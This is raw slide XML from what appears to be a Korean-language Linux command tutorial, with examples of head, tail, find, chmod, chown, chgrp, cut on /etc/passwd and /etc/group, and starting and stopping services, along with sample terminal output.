                <a:t>]# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>head </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>–n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머리</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>(head</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>)</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a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost log]# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>tail –n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꼬리</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>(tail)</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ACAA963-207D-4258-81F9-AD4DF900099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AD85071-8DD1-49B8-A540-1CDC102A6DC0}"/>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19BDAC37-E8CA-4360-AFF9-1997BF7047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F47711-9871-4C90-9ED4-B55AFD8B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7E21129-F825-4CF1-84A2-D3753BC262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26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D0C1BC5A-6C74-4D83-ACDE-B41F38D7A407}"/>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12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FED98565-DD5C-47B2-9C81-EE5918146ECC}"/>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13" name="직선 화살표 연결선 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63028D1-6A38-4386-A521-036625C6C851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11"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전문사관 24기 임관식 괴산에 있는 아들 군대 훈련소 다녀왔습니다. : 네이버 블로그">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2101780-9A11-40BC-B2F2-873BD2D74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761" y="1690688"/>
            <a:ext cx="6655485" cy="4417578"/>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122F1C54-A6A8-4875-B01C-0953677360E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6166925" y="3629889"/>
            <a:ext cx="314696" cy="843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D14CC1E-EABC-4EB1-815D-10B03818C26B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="481437" y="1690688"/>
            <a:ext cx="2756522" cy="4975672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="그룹 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D34325EB-4002-4F1B-ABB1-70FD0CC717D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8109F1D-37B2-4B9F-A1E5-250D473AB78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66A8103-E784-4FC2-8FDA-5D723E26323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5" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96B33839-AA97-4DFB-BB28-4B01CF8558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809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find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파일이나 디렉토리를 검색</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040611"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="4218290"/>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21829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find /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -name "</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>*"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>pam.d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rc.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>init.d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/ssh_host_dsa_key.pub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ssh_host_rsa_key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/ssh_host_rsa_key.pub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ssh_config</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ssh_host_dsa_key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sshd_config</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644</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/test/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>findme</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/test/first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584890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chmod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권한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chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 777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t>/test/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>findme</a:t>
              </a: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12:21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rwxrwxrwx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>    0  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>28 12:24 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>findme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386924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chown</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-user </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>adm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a: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13:13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chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>adm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 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-user </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>adm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/test/findme1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13:13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8254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chgrp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그룹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-group mem</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13:16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13:16 findme2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chgrp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> mem 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-group mem</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/test/findme2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13:16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mem     0  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>28 13:16 findme2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817733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a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> :</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040611"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="4218289"/>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218289"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/passwd |head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daemon:x:2:2:daemon:/</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sync:x:5:0:sync:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:/bin/sync</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>shutdown:x:6:0:shutdown:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/shutdown</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>halt:x:7:0:halt:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/halt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>mail:x:8:12:mail:/var/spool/mail:/</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news:x:9:13:news:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/news:</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cut -f1 -d: /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/passwd |head</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>root</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>bin</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>daemon</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>adm</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>lp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>sync</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>shutdown</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>halt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>mail</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cut -f1 -d: /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/group |head</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>root</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>bin</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>daemon</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>sys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>adm</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>tty</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>disk</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>lp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>mem</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>kmem</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223360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service : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>시스템 서비스 조작</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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>init.d</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ls -al | head</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>652</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4 06:31 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-x 10 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>16  2018 ..</a:t>
              </a:r>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1897  7</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>22  2011 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>NetworkManager</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1566  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>23  2012 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>acpid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1441  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>28  2007 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>anacron</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1429  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>14  2007 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>apmd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1284  1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>27  2010 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>atd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3328  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>23  2012 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>auditd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3052  4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>20  2012 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>autofs</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>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start</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>을</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>를 시작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stop</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>를 정지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restart</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
